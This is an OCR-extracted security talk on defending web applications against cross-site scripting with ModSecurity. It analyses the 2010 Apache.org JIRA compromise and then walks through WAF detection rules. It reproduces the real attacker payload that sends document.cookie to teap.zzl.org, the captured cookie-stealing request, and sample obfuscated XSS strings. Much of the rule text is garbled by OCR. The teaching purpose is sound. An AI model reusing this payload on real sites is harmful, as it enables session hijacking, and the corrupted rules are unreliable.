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Ryan Barnett - Background 











Trustwave 
- Member of the SpiderLabs Research Team PBA [rustwave: 
° Senior Security Researcher —— — ————SpiderLabs 


-Web application firewall research/development 
-Virtual patching for web applications 

e ModSecurity Community Manager 
-[nterface with the community on public mail-list 
-Steer the internal development of ModSecurity 
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Open Source Web Application Firewall 








Author 
e "Preventing Web Attacks with Apache" 
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Ryan Barnett — Community Projects 





Open Web Application Security Project (OWASP) 
e Speaker/Instructor 
* Project Leader, ModSecurity Core Rule Set 
* Project Contributor, OWASP Top 10 
* Project Contributor, AppSensor 


Web Application Security Consortium (WASC) 
* Board Member 


* Project Leader, Web Hacking Incident Database 

* Project Leader, Distributed Web Honeypots 

* Project Contributor, Web Application Firewall Evaluation Criteria 
* Project Contributor, Threat Classification 


The SANS Institute 
e Courseware Developer/Instructor 
* Project Contributor, CWE/SANS Top 25 Worst Programming Errors 
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Session Outline 


e XSS Intro 
。 What is it? 
e Real-world compromise of Apache.org 


° XSS Remediation 
° Strategic vs. Tactical 
。 When you can't fix the code 


e XSS Street-Fight 


* Input Validation 
- Whitelist Filtering 
— Blacklist Filtering 
- Generic Attack Payload Detection 
。 Identify Output Handling Flaws 
— Missing output escaping of user-supplied content 
e Application Response Profiling 
— Track the # of scripts/iframes in pages 
* Defensive JS Injection 
— JS Sandbox 


° Conclusion/ Questions 
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XSS Introduction 


Background 
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Cross-Site Scripting (XSS) 





Attack: XSS 


e Attacker can send data through web applications that will execute code within the victim's 
web browser 


e Itisan interpreter attack against the web browser 
Application Defects: Improper Output Handling 
° 2 enuon does not properly apply contextual output encoding/escaping of user supplied 
ata 
Types: 
。 Reflected, Stored and DOM 


Consequences: 
e Session Hijacking, Malware Installation, Fraud (CSRF) 


Remediation: Contextual Output Encoding 
。 Must escape differently depending where data is displayed on the page 
— HTML, HTML Attribute, URL, JavaScript, CSS 


Reference: OWASP XSS Cheatsheet 
。 — http://www.owasp.org/index.php/XSS (Cross Site Scripting) Prevention Cheat Sheet 
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WASC Web Hacking Incident Database (WHID) 





* Entry Title: WHID 2010-67: Apache.org hit by targeted XSS 
attack, passwords compromised 


° WHID ID: 2010-67 

* Date Occurred: April 9, 2010 

。 Attack Method: Cross Site Scripting (XSS), Brute Force 
* Application Weakness: Improper Output Handling 

* Outcome: Session Hijacking 


。 Reference: 
http: / /blogs.zdnet.com/security /?pz6123&tag z nl.e539 





http://projects.webappsec.org/Web-Hacking-Incident-Database 
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Attackers opened a new issue in JIRA 
e INFRA-2591 


Issue contained the following text 


ive got this error while browsing some projects in jira 
http://tinyurl.com/XXXXXXXXX [obscured] 


Some administrators clicked the evil link 


* Crafted to exploit a previously undisclosed reflected XSS 
vulnerability 


° XSS used to conduct session hijacking attack 
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TinyURL Redirect 


HTTP/1.1 302 Found 


Location: https$3A$2F$2Fissues.apache.org$2Fjira$2Fsecure$2Fpopups 
$2Fcolorpicker. jsp%3Felement% 3Dname%3B% 7/Dcatch%28e%29%7B%7D 
$250D%250A--S3ES3CS2FscriptS3E%3Cnoscript%3E%3Cmetathttp-equiv 
$3D%22refresh%322+content33D%3220%3Burl%33Dhttp%3A32F%2Fpastie.org 
%2F904699%22%3E%3C%2Fnoscript$33E%3Cscript33Edocument.write 
$2892753Cimgtsrc$3D$22http$3A£22F£$2Fteap.zzl.org£$2Fteap.php 
s3Fdata%3D%27%252bdocument.cookiet252b%27%22%2F%33E 
%27%29%3Bwindow.location$3D%322http%33A%32F%2Fpastie.org 
$2F9046992229$3B$3C$2Fscript$3E$3Cscript$3E£$3C221-- 
526defaultColor$3D52753Btry57BS2FS2F 


Content-Iypez text/html 
Content-Length: 0 

Connection: close 

Date: Wed, O1 Dec 2010 17:33:52 GMT 
Server: TinyURL/1.6 
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Reflected XSS Request 





https://issues.apache.org/jira/secure/ 
popups/colorpicker.jsp?element-name; | catch 
(e) {}SODSOA--></script><noscript><meta 
sZOhttp- 
equiv="refresh"%20content="0;url=http:// 
pastie.org/904699"></noscript> 
«script»document.write('«img 
s20src="http://teap.zzl.org/teap.php? 
data-'$2bdocument.cookie$2p'"/ 
>');window.location="http://pastie.org/ 
904699"; 
</script><script><!--&defaultColor=';trv 


{// 
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Reflected XSS in Page 





«script language-"JavaScript" type="text/javascript"» 
Lee 

var defaultColor = '';try{//'; 

var choice = false; 

var openerForm = opener.document.jiraform; 

var openerEl = opener.document.jiraform.name; }catch(e) {} 


--></script><noscript><meta equiv="refresh" 
content="0;url=http://pastie.org/904699"></ 
noscript><script>document.write('<img src="http:// 
teap.zzl.org/teap.php?data='+document.cookie+'" / 
>');window.location="http://pastie.org/904699" ;</ 
script><script><!--; 

function colorIn(color) | 

if (!choice) | 


openerEl.value = color; 
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Display a remote page 





<script language-"JavaScript" type="text/javascript"» 
Lee 

var defaultColor = '';try{//'; 

var choice = false; 

var openerForm = opener.document.jiraform; 

var openerEl = opener.document.jiraform.name; }catch(e) {} 


--></script><noscript><meta equiv="refresh" 
content="0;url=http://pastie.org/904699"></ 
noscript><script>document.write('<img src="http:// 
teap.zzl.org/teap.php?data='+document.cookie+'" / 
>');window.location="http://pastie.org/904699";</ 
SLIP 

function colorIn(color) { 

if (!choice) | 


openerEl.value = color; 
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java.lang.NumberFormatException: For input string: 






Stack Trace: [hide] 


































java. lang.NumberFormatException: For input string: 
at java. lang.NumberFormatException. forInputString(NumberFormatException. java: 48) 
at java.lang.Long.parseLong(Long. java:410) 
at java.lang.Long.<init>(Long. java: 678) 
at com.atlassian.jira.util.ParameterUtils.getLongListFromStringArray(ParameterUtils.java:561) 
at com.atlassian.jira.issue.transport.impl.IssueNavigatorActionParams . getSearchContext(IssueNavigatorActionParams .java:57) 
at com.atlassian.jira.web.action.issue.SearchDescriptionEnabledAction.getSearchContext(SearchDescriptionEnabledAction. java: 109) 
at com.atlassian.jira.web.action.issue.IssueNavigator.populateAndValidate(IssueNavigator . java: 248) 
at com.atlassian.jira.web.action.issue.IssueNavigator.doExecute(IssueNavigator. java: 135) 
at webwork.action.ActionSupport.execute(ActionSupport. java: 153) 
at com.atlassian.]jira.action.JiraActionSupport . execute(JiraActionSupport. java: 54) 
at webwork.dispatcher.GenericDispatcher. executeAction(GenericDispatcher. java: 132) 
at com.atlassian.]jira.web.dispatcher.JiraServletDispatcher.service(JiraServletDispatcher. java: 178) 
at javax.servlet.http.HttpServlet.service(HttpServlet. java: 803) 
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain. java: 269) 
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain. java: 188) 
at com.atlassian.core.filters.HeaderSanitisingFilter.doFilter(HeaderSanitisingFilter.java:44) 
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:215) 
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain. java: 188) 
at com.atlassian.jira.web.filters.AccessLogFilter.doFilter(AccessLogFilter. java: 73) 
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:215) 
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain. java: 188) 
at com.opensymphony.module.sitemesh. filter.PageFilter.parsePage(PageFilter. java:119) 
at com.opensymphony .module.sitemesh.filter.PageFilter.doFilter(PageFilter.java:55) 
at com.atlassian. jJira.web.filters.SitemeshExcludePathFilter.doFilter(SitemeshExcludePathFilter. java: 38) 
at org.apache.catalina.core.ApplicationfilterChain. internalDoFilter(ApplicationFilterChain. java: 215) 
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java: 188) 
at com.atlassian.seraph.filter.SecurityFilter.doFilter(SecurityFilter. java: 204) 
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.]java:215) 
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java: 1588) 
at com.atlassian.seraph.filter.TrustedApplicationsFilter.doFilter(TrustedApplicationsFilter.java: 129) 
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.]java:215) 
at .apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain. java: 188) 
g lan. seraph fi ilter doFilter(BaseloainFilter, java: 138 
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Grab the document.cookie 





<script language-"JavaScript" type="text/javascript"» 
Lee 

var defaultColor = '';try{//'; 

var choice = false; 

var openerForm = opener.document.jiraform; 

var openerEl = opener.document.jiraform.name; }catch(e) |) 


--»«/script»«noscript»«meta equiv="refresh" 
content="0;url=http://pastie.org/904699"></ 
noscript><script>document.write('<img src="http:// 
teap.zzl.org/teap.php?data='+document.cookiet+'" / 
>');window.location="http://pastie.org/904699";</ 
SE e ==} 

function colorIn(color) í 

1f (!choice) { 

openerkl.value = color; 


® 
"a Trustwave 


Cookie Stealing Request 





GET /teap.php? 
data=JSESSIONID=2FA3A31B6D58E282D40DE3ED6814BCC3; 
ASESSIONID=19cvqfx-2FA3A31B6D58E282D40DE3ED6814BCC3 


HTTP/1.1 
Host: teap.zzl.org 


User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 
10.6; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6 


Accept: image/png, image/*;q=0.8,*/*;q=0.5 
Accept-Language: en-us,en;q-0.95 
Accept-Encoding: gzip,deflate 

Accept-Charset: ISO-8859-l,utf-9;q-0.7,*;q-0.] 
Keep-Alive: 115 

Connection: keep-alive 


Referer: https://issues.apache.org/jira/secure/popups/ 
colorpicker.jsp 
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XSS Remediation 


Strategic vs. Tactical 


Strategic vs. Tactical 





Both Strategic & Tactical remediation efforts should be used to 
combat XSS flaws. 


Strategic Initiatives 
* Ownership is application developers 


* Focus on root-causes of vulnerabilities for web applications that 
must be fixed within the application code itself 


* [deal for applications that are in the Design phase of the SDLC 
* Keep in mind that this takes TIME 


Tactical Responses 
* Ownership is operations security staff 


* Focus on web applications that are a/ready in production and 
exposed to attacks 


* Examples include using a WAF for virtual patching 
。 Aim to minimize the Time-to-Fix exposures 
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Can | fix the code? 









Application as 
blackbox 
High 
High percentage bough 
High percentage modified 
No product sc e code 
LL 
= 
= Mostly developed ip-Aiouse 
= Low percentage'bought in 
O Average 
a 
= 
Š Full aceéss to 
D irce and developers 
co 
Low 
Full Partial Little 


Access to application 


Image — OWASP Best Practices: Use of Web Application Firewalls 
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ModSecurity 





It is an open source web application firewall (WAF) module for 
Apache web servers 


° www.modsecurity.org 
Separate Rule and Audit Engines 
* Allows full request/response HTTP logging capability 
Deep understanding of HTTP and HTML 
* Robust Parsing (form encoding, multipart, XML) 
Event-based Rules Language 
e Anti-Evasion Features (normalization functions) 
Advanced Capabilities 
* Transactional and Persistent Collections 
° Content Injection 
e Lua API 
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Example Rule Syntax 





Tells 
ModSecurity 
where to look 


Tells ModSecurity 
how to process data 





oecRule TARGETS OPERATOR 
| TRANSFORMATIONS, ACTIONS | 









Tells ModSecurity what 
to do if a rule matches 





Tells ModSecurity how to 
normalize data before the 
operator is applied 
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ModSecurity Demo Page 





Results (txn: vwicRn8AAQEAAAkYmzgAAAAC) 





CRS Anomaly Score Exceeded (score 137): IE XSS Filters - Attack Detected 


All Matched Rules Shown Below 





9000033 Detects obfuscated script tags and XML wrapped HTML 
Matched <scri at TX:ARGS:test_normalized 


9000017 Detects JavaScript object properties and methods 
Matched (document. at TX:ARGS:test_normalized 


9000023 Detects JavaScript location/document property access and window access obfuscation 
Matched (document.cookie)«/script» scriptalert( at TX:ARGS:test_normalized 


9000038 Detects possibly malicious html elements including some attributes 
Matched <script at TX:ARGS:test normalized 


958001 Cross-site Scripting (XSS) Attack 
Matched document.cookie at ARGS:test 


958052 Cross-site Scripting (XSS) Attack 
Matched alertí at ARGS:test 


http://www.modsecurity.org/demo/crs-demo. html 
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Demo Page Stats 


。 Online for all of 2010 


* Received >18,700 requests 
e Mainly XSS and SQL Injection attacks 


* Attack was considered successful it if did not trigger any 
ModSecurity alerts 


* Automated process would identify evasions 
° SpiderLabs would develop/deploy detection updates 


° Let the battle begin! 
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WAF Defensive Strategy #1: Input Validation 


Whitelist/Blacklist Filtering 


Input Validation/Filtering Approaches 


Whitelist Filtering: deny all, allow what's right 


e Enforce expected input for parameter 
data 





Blacklist Filtering: allow all, deny what's wrong " 


e Blacklist known bad characters or 
payloads 
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Whitlisting Rule Example 





* In a virtual patching scenario, it is possible to create rules 
that allow only specific characters 


SecRule REQUEST FILENAME "@streq /jira/secure/popups/ 
colorpicker.jsp" "chain,phase:2,block,capture,t:none" 


SecRule ARGS:element "!^Nw-4$" 





Only allow word — 


. : characters: a-zA-Z0-9 
* Limitations 2 


* This is a reactive strategy that is applied only to specific 
locations 


* What about free-form text fields or applications that must allow 
html? 
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Targeted Blacklist of Meta-Characters 








In a virtual patching scenario, it is also possible to create rules 
that blocks the presence of specific meta-characters that are 
often used in XSS attacks 





SecRule REQUEST FILENAME "@streq /jira/secure/popups/ 
colorpicker.jsp" "chain, phase:2,block, capture, t:none" 


SecRule ARGS:element "@pm < > ( ) MN" ' ;" 





Fast, set-based pattern 
iL match (Aho-Corasick) 
° Limitations 


This is a reactive strategy that is applied only to specific locations 
The blacklist may not be comprehensive 


What about parameters that must allow some of these characters? 
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Limitations of Blacklist Filtering 


Blacklist Filtering 
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Attack Payload Detection 











| category || discussion | | viewsource || history | 





























Category:OWASP ModSecurity Core Rule Set Project 
OUE Download | Bug Tracker Demo Installation ` Documentation Presentations and Whitepapers | Related Projects 
Latest News and Mail List | Contributors, Users and Adopters ` Project About 
PROTE 
Overview d 
OWASI ModSecurity is an Apache web server module that provides a web application firewall engine. mo 
The ModSecurity Rules Language engine is extrememly flexible and robust and has been Open Source Web Application Firewall I 
an. referred to as the "Swiss Army Knife of web application firewalls." While this is certainly true, it ion and 
exf | doesn't do much implicitly on its own and requires rules to tell it what to do. In order to enable web server 
Crit users to take full advantage of ModSecurity out of the box, we have developed the Core Rule N 
Set (CRS) which provides critical protections against attacks across most every web i i 
OWASI | architecture. modsecurity sitory of 
m Unlike intrusion detection and prevention systems, which rely on signatures specific to known | he 
9XF | vulnerabilities, the CRS is based on generic rules which focus on attack payload identification in Ices. 
(As | order to provide protection from zero day and unknown vulnerabilities often found in web 
applications, which are in most cases custom coded. 
owası | “P 
afr Detection Categories at Rails 
dev In order to provide generic web applications protection, the Core Rules use the following 
i techniques: 
Cri M le 
= Protocol compliance: A | r t ® 
OWASI * HTTP request validation - This first line of protection ensures that all abnormal HTTP A US Wave Cure 
ap requests are detected. This line of defense eliminates a large number of automated and ——— SpiderLa bs setof 
(As non targeted attacks as well as protects the web server itself. _ f W format, 





http://www.owasp.org/inndex.php/Category:OWASP ModSecurity Core Rule Set Project 
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Example XSS Attack Payload Resources 





Rsnake’s XSS Cheatsheet 
¢ http://ha.ckers.org/xss.html 


° HTML5 Security Cheatsheet 
° http://html5sec.org/ 


。 WASC Script Mapping Project 
¢ http://projects.webappsec.org/Script-Mapping 


° FuzzDB 
。 http://code.google.com/p/fuzzdb/ 


° PHPIDS Test Payloads 
¢ https://trac.php-ids.org/index.fcgi/browser/trunk/tests/IDS/MonitorTest. php 


。 Microsoft's IES XSS Filters 


» http://blogs.technet.com/b/srd/archive/2008/08/19/ie-8-xss-filter- 
architecture-implementation.aspx 
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Example XSS Attack Payload Rule 





* Looking for HTML Event Handlers 


/ SecRule REQUEST FILENAME |ARGS NAMES |ARGS | XML: /* “A bon 
(abort|blur|changelclick|dblclick|dragdroplerror|focus| 
keydown | keypress|keyup | Load |mousedown |mousemove | 
mouseout |mouseover |mouseup |move | readystatechange | reset | 
resize|select |submit |unload) \b\W*?=" N 





"phase: 
2yrev:'2.1.1',1d:'973303', capture, t:none,t:lowercase, pa 
ss,nolog,auditlog,msg:'XSS Attack Detected', logdata:'% 
a SEES ISSN bu miss 

LOUE MEG | eSeLWsu b SS SCO 

(Se, CIME OI suce al SOS | eee Welle = Esc FIA OMESSA 
(Ex. TIRE money Sor), Seven: tato FILE reye 

WEB ATTACK/XSS-$(matched var name}=%{tx.0}" 
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Encoding Examples 





* Original form 
«script»alert( XSS')«/script» 


* HTML Entity Encoding 


Sit; seriptsgt; alert (&apos;xssé&apos;) &lt;/ 
script&gt ; 


* Hex Entity Encoding 


ches T2; &#x63:&#x72;&#x69:8#x70;&#x 14; &#4x3e; & 
#x61:&#x6 :&ix65; SFX 72; G#RIL; GARZO; &tix27; 64x78; 
&#x73; & # 1273. #227: G#x29; &#X3C; &#x2£;&#Xx73; &#x63 

:&ix/2:&ix69:;&ix70;Six/l4A:&ix3e; 
* Half-Width/Full-Width Unicode Encoding 

\ufflc\uff53\uff43\uff52\uff49\uff50\uff54\uffle 
Ei a 146 
NVuff45Nuff52Nuff54NuffO0OB8NuffO7Nuff58Nuff53Nuff5 
3Nuf £O7Nuf fOONuf f 1 cNuf £ O£ 
\uff53\uff43\uff52\uff49\uff50\uff54\uffle 
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ModSecurity’s Transformation Functions 


* ModSecurity includes a number of transformation functions 
which will normalize data prior to applying operators 


° urlDecodeUni 

。 htmlEntityDecode 
* jsDecode 

* cssDecode 


SecRule REQUEST FILENAME|ARGS NAMES|ARGS|XML:/* 


V(fremenarccode] alert] eva) \a “TO 
"phase: 
2,rev:'2.1.1',1d:'973307',capture, t:none,t:htmlEntityDe 





code ,t: jsDecode,t: lowercase, pass, nolog, auditlog, msg: ' XS 
o Attack Detected', logdata:'s{TX.0}',setvar: 'tx.msg=% 
TCU Danse yo SSI Welle sex, KES S COIT 6 

ers Oe dE SEC SHE eun Oed a SE FIOM EN S C OCS srs 
(ESE GAL O ONE TOS p Se EWVEHER EROS oy ler ol 

WEB ATTACK/XSS-%{matched var name}=%{tx.0}" 
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Nested Encoding Examples 





Original form 
<script>alert (/XSS/)</script> 


Base64Encoded Fragment #1 


«applet src="data:text/ 
html; base64, PAN JemlwdD5hbGVydCgvWFNTLyk8L3N 
jcmlwdD4" type=text/html> 


Base64 Encoded Fragment #2 - PHP 


«applet src="data:text/ 
html;base64, P.HNJcmlwdD5hbGVydCgvWENTLyk8L3 


NjcmlwdD4" type=text/html> 






“Notice the ` 
extra dot 
. character? 
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Lua Port of PHPIDS 





http: / /phpids.net/ 
~70 regular expression rules to detect common 
attack payloads 


e XSS 
。 SQL Injection @ 
e RFI 


Filters are heavily tested by the community and 
updated frequently 
e https://svn.php-ids.org/svn/trunk/lib/IDS/ 
Converter.php 
¢ https://svn.php-ids.org/svn/trunk/lib/IDS/ 
default_filter.xml 
* Thanks to Mario Heiderich 


PHPIDS 


WEB APPLICATION SECURITY 2.0 





NO \ang uage 





Trustwave SpiderLabs worked with PHPIDS lead to 
port code to Lua for use in ModSecurity's API 


¢ Introduced in OWASP ModSecurity CRS v2.1.0 
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Example Normalization Functions 





# Lua script to normalize input payloads 

# Based on PHPIDS Converter.php code 

# Reference the following whitepaper - 

+ http://docs.google.com/Doc?id-dd7x5smw 17g9cnx2cn 
# 

S 


ecRuleScript ../lua/advanced filter converter.lua "phase:2,t:none,pass" 


--[[ Make sure the value to normalize and monitor doesn't contain Regex DoS ]] 
--[[ Check for comments and erases them if available ]] 

--[[ Strip newlines ]] 

--[[ Checks for common charcode pattern and decodes them ]] 

--[[ Eliminate JS regex modifiers ]] 

--[[ Converts from hex/dec entities ]] 

--[[ Normalize Quotes || 

--[[ Converts SQLHEX to plain text ]] 

--[[ Converts basic SQL keywords and obfuscations ]] 

--[[ Detects nullbytes and controls chars via ord() ]] 

--[[ This method matches and translates base64 strings and fragments ]] 
--[[ Strip XML patterns ]] 

--[[ This method converts JS unicode code points to regular characters ]] 
--[[ Converts relevant UTF-7 tags to UTF-8 ]] 

--[[ Converts basic concatenations ]] 

--[[ This method collects and decodes proprietary encoding types ]] 
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Debug Log View of Base64 Decoding 








[07/Jan/2011:11:28:24 --0800] [www.modsecurity.org/ 
sid#8407588] [rid#b5b88c0] [/demo/phpids] [4] Base64 Data is: 
PHNJ cmlwdD5hbGVydCgvwENTLyk8L3NjcmlwdD4. 
[07/Jan/2011:11:28:24 --0800] [www.modsecurity.org/ 
sid#8407588] [rid#b5b88c0] [/demo/phpids] [4] Base64 Data Decoded 
is: <script>alert (/XSS/)</script>. 

[07/Jan/2011:11:28:24 --0800] [www.modsecurity.org/ 
s1d#8407588] [rid#b5b88c0] [/demo/phpids] [4] Base64 Data 
Normalized: <applet src="javascript:text/ 

html ;base64 ‚<script>alert (/XSS/)</script>" type=text/html>. 
== 

[07/Jan/2011:11:28:24 --0800] [www.modsecurity.org/ 
sid#8407588] [rid#b5b88c0] [/demo/phpids] [9] Set variable 
"tx.ARGS:test normalized" to "<applet src=\"javascript:text/ 
html;base64,<script>alert(/XSS/)</script>\" type=text/html> 
\nappletalert (/XSS/)script\" type=text/html>". 
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Converted PHPIDS Filters 





<filter> 
<id>1</id> 
«rule»«![CDATA[(?:"[^"]*[^-]?2) | (?: [*\w\s] \s*\/>) | (?:>")]]></rule> 
<description>finds html breaking injections including whitespace 
attacks</description> 
“Gage 
<tag>xss</tag> 
<tag>esrf</tag> 
</tags> 
<impact>4</impact> 
</filter> 


SecRule TX:'/* (QUERY |REQUEST |ARGS:).* normalized/' "(?:\"[*\"]* 
[*-]?>) | (2: [*\w\s]\s*\/>) | (?:>\")" "phase: 
2,capture,t:none,t:lowercase,pass,skip:l,nolog,auditlog,msg: 'finds 
html breaking injections including whitespace 
attacks',id:'900001',tag: 'WEB_ATTACK/XSS' ‚tag: 'WEB ATTACK/ 
CSRF',logdata:'$(TX.0)',severity:'2',setvar:'tx.msg-$(rule.id)-$ 
{rule.msg}',setvar:tx.anomaly score=+4,setvar:'tx.sitx.msg)- 

WEB ATTACK/XSS-%{matched var name}=%{tx.0}',setvar:'tx.%{tx.msg}- 
WEB ATTACK/CSRF-%{matched var name}=%{tx.0}’” 


> i 
PA Trustwave 








rm Bass u / " a | 
3 Presepi uL | y SON 
d PC l-~ata@l sate | 
nC imi: 
M Key Ctr ds ID: as È 





» 
路 [rustwave' 


SpiderLabs' 


WAF Defensive Strategy #2: 
Generic Attack Payload Detection 














Need to ensure that the WAF, web 
application and browser all normalize 
and interpret data in the same way 


Not as easy as you might think 


WEB APPLICATION 


nmn Issues 
Browser Quirks 
RFC Implementation Differences 
Encodings 
JavaScript Comments 
Non-alphanumeric JavaScript 
Best-Fit Mappings 


Blacklist filtering approach to combat 
XSS is doomed to fail... 
Endless methods of achieving 
functionally equivalent code 
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Non-Alphanumeric Javascript 


。 Care to guess what this this code does? 


__=1$48) 

1774$) [ / +Š [$1)] 
| 

e Or this: 


*,£,,O]=!{}+{}, [[G,p]=!!A+A] [*+0+p 
A+B+E+pu+C] (-~A) 


— ` 


* If either of these code snippets falls within JavaScript inside 
the DOM, then it will execute an alert(1) pop-up 
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Generic Attack Payload Detection 





e Obfuscation methods often have certain characteristics 


° OWASP ModSecurity Core Rule Set 
* Amount of different meta-characters 
* Repetitive use of non-word characters 


° PHPIDS Centrifuge Concepts 
* Ratio 


° count of word characters, spaces, punctuation vs. non-word 
characters 


e Ratio of < 3.49 = Malicious 
* Normalization/Stripping 


e Remove of convert any word character and spaces including line 
breaks, tabs and carriage returns 


* Regex check in the default filters.xml matches malicious result 
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Restricted Character Usag 





SecRule ARGS "@pm < ^ ! @ 48 $$ ^&* () - + = ( ) [ ] 1: > 
Mi 6 > UL oleis 
2,t:none,nolog,pass,nolog,setvar:tx.restricted char payload-$ 
(matched var}" 


SecRule IB S NS IEC WED) (CHAIR EZ TOAL "Qcontains -" "phase: 
2,t:none,pass,nolog,setvar:tx.restricted char count=+1" 


SecRule JO S INES hi CAR "ees AO "Qcontains `" "phase: 
2,t:none,pass,nolog,setvar:tx.restricted char count=+1" 


SecRule JS SINGS TE IED CHAK PS AO "Qcontains !" "phase: 
2,t:none,pass,nolog,setvar:tx.restricted char count=+1" 
>=CUT== 





SecRule TX:RESTRICTED CHAR COUNT "@ge 5" "phase: 

Zenone mod ole INO LOG pete Los, dois GS S 7 16e W S 2 9 1. ds use RSS 
tricted Character Anomaly Detection Alert - Total # of special 
characters exceeded',logdata:'$ 

(MELE MSG wer Ce sis anioni Wy con ers 

[lets ian mom Sere pi 








> i 
"a Trustwave 


Repeated Non-Word Characters 





SecRule ARGS "\W{4,}" "phase: 
DESSEN T IE EIE P ON Oe neq eer ento sa des 








msg 


TL 
> 
B 


A SALA A EEN 


-_- TE 



















adio d 
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ModSecurity CRS Demo Example 








All Matched Rules Shown Below 





— Centrifuge Threshold Alert - Ratio Value is: %{tx.0} 
Matched 2.15625 at TX:ARGS:test_centrifuge_ratio 


960023 Restricted Character Anomaly Detection Alert - Total # of special characters exceeded 
Matched = at TX:restricted_char_count 


960024 Restricted Character Anomaly Detection Alert - Repetative Non-Word Characters 
Matched / $ at TX:ARGS:test_normalized 


9000045 Detects basic SQL authentication bypass attempts 2/3 
Matched ":xx $x at TX:ARGS:test_normalized 


9000067 Detects unknown attack vectors based on PHPIDS Centrifuge detection 
Matched ((++:: at TX: ARGS:test centrifuge converted 
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Debug Log View of Centrifuge Ratio 





Starting Centrifuge.. 
Arg Name = ARGS:test and Arg Value = x=/x/ 


REA ARE Matton E 
SXIXX SS Le OO ee a 

x.x=\"\". eval, X.X(X.X 

(Sx) ) . 


Strip Paddingl - name is: ARGS:test and value is: x-/x/ $x=!!1?\"ash 
imis JI ht ala oe Zu mn, val. 
X.X(X.X(9X) ) . 

Strip Padding2 - name is: ARGS:test and value is: x-/x/ $x=!!1?\"ash 
vige ¡x= Lo A ELONSH "ae ger 5x) FIAT oe "r zik Xex- A evil; 
aaasx) ). 

stripped length is: 32. 

overall value is: x-/x/ $x=!1?\"aaa\"aaa$x=!1?\"aaa\"+Saaa$Sx=!1?\"aaa 
\"+Saaa=\"\"aaasx) >). 

overall length is: 69. 

pedali WOIELADLeS TO OO. Contr ge Calia 

Set variable "tx.ARGS:test centrifuge ratio" to "2.15625". 

Threshold is: 3.49 and Ratio Value is: 2.15625. 
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Debug Log View of Centrifuge Stripping 








Unique/Sorted: !"S()+,./1:=?\acehilnostvx. 
Replace non-special chars: "$()+/=?\. 
Normalize certain tokens: "S()++=?\. 
Normalize certain tokens: "S()++=?\. 
Normalize certain tokens: "S((++=?\. 


Normalize certain tokens: "S((++::\. 

Normalize certain tokens: ((++::. 

Normalize certain tokens: ((++::. 

Soreed: Keri. 

Setting variable: tx.ARGS:test centrifuge converted=((++:: 
Set variable "tx.ARGS:test centrifuge converted" to "((++::". 
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WAF Defensive Strategy #3: 
Identifying Improper Output Handling Flaws 


Dynamic Taint Propagation 


Dynamic Taint Propagation 





。 Follow untrusted data and see where it is misused 


Reflected XSS victim submits the malicious ModSecurity inspects inbound 





payload to the web application data looking for suspicious 
payloads (containing meta- 


characters 





document.write ('<1img 
src-"http://teap.zzl.org/ 
teap.php? 

Gaba! document teo e 












<html><body>..document.write 





(&#x27&1lt; img Target Site 


src=équot; http: &#x2f£&#x2fteap. 
72 ll, orgs#22fteep php> 
data=&#x27%2bdocument.cookie 
s2b0&#x27&quot; &#Xx2f&gt; &#x2 T)... 
</body></html> 


ModSecurity inspects outbound 
response body and does not 
find a match as the app 
applied output encoding/ 
escaping of user-supplied 
data 
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Dynamic Taint Propagation 





* Missing Output Encoding — Reflected XSS Attack 





(1) Reflected XSS victim submits the malicious ModSecurity inspects inbound 
payload to the web application data looking for suspicious 
e payloads (containing meta- 

characters 





document.write ('<imo 
src-"http://teap.zzl.org/ 
teap.php? 

Gaba! document teo e 


^ «html»«body»..document.write dm | w. 











e I DE š 
DO” ¿5 ss mis < 
x 5 x š 
3 a 3 è 
i i š 
"on e| olè) ° = 
q tu + 
y Fi 
` di «[3] ç * B 
Ñ 





("<img src="http:// Target Site 





teap.zzl.org/teap.php? 
data='+document.cookiet'"/>')... 


</body></html> ModSecurity inspects the 


current outbound response 
body and if suspicious 
inbound data is sent back out 
non-encoded, it can block the 
response 


® 








Reflected Application Defect Rule 





/ 
/ 
/ 


SecRule ARGS "@pm < > () N" ' ;" "chain, phase: 
4, t:none, log, auditlog, deny, status: 

403, id:'l',msg:'Potentially Malicious Meta- 
Characters in User Data Not Properly Output 

Ii e O09. . "7 LOGICA S L mi ou meta 
Characters} '" 


SecRule MATCHED VAR "*.{13,}$" 
MASAS E MODE, SSTWE EX dm om meza-eharacters- 
s{matched var}" 


SecRule RESPONSE BODY "@contains % 
{tx.inbound meta-characters}" 
"ctl: auditLogParts=+tkK" 
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Dynamic Taint Propagation 





* Missing Output Encoding — Stored XSS Attack 





(1) Attacker submits the malicious stored XSS ModSecurity inspects inbound 
payload to the web application data looking for suspicious 
eD payloads (containing meta- 

characters 


..document.write('«img 
src-"http://teap.zzl.org/ 
teap.php? 

data document jiji u, c 














—  —— <html><body>..document.write — 
=> A ('<img src="http:// T arg et Site 


teap.zzl.org/teap.php? 





mdm 





data='+document.cookiet'"/>')... 


</body></html> ModSecurity inspects all 


outbound response bodies 
and if suspicious inbound 
data is sent back out non- 
encoded, it can block the 
response 


® 








Stored Application Defect Rule 








SecAction "phase:1,nolog,pass,initcol:global=xss list" 
„Reflected XSS Rules Here... 


SecRule GLOBAL: '/XSS LIST .*/' "@streq $(tx.inbound meta- 
characters}" "phase:4,t:none,nolog,pass,skip:1" 


SecRule TX: EAS OUND DALE TES ELENA TROIS Wa O SS E 
4,t:none,nolog, pass, setvar:global.xss list 3{time epoch)=5 
{matched var}" 


SecRule GLOBAL:'/XSS LIST .*/' "(within $(response body}" 
"ohase:4,t:none, log,auditlog,pass,msg:'Potentially Malicious 
Meta-Characters in User Data Not Properly Output 

Ps s Tags Was ATRACK OS SS V 
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Viewing Saved Global Data 


u 





# java -cp /root/org.jwall.tools.jar 
org. jwall.tools.CollectionViewer /tmp/ 


